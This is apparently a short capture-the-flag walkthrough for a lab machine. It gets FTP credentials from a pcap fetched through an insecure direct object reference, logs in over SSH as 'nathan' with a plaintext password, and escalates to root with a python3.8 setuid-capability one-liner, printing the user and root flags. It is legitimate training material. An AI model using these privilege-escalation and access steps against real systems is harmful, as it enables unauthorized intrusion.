Accessing the web page we can see this web page http://10.10.10.245/data/4. By default it set us to the number 4 or file 4. We can change the request to 0 and download a .pcap file containing all network traffic where we can capture the username and password for nathan.

USER nathan

PASS Buck3tH4TF0RM3!

ssh as nathan

nathan:Buck3tH4TF0RM3!

user.txt - 43a60c707e9ee55d3c1c067366cfdc97

running linpeas we can see we have python suid/capabilities and looking at gtfo bins we can exploit this.

navigate to /usr/bin

./python3.8 -c 'import os; os.setuid(0); os.system("/bin/sh")'

We are root

root.txt - 7ecaf1f3cf53a5de0e4ba676e2693e3a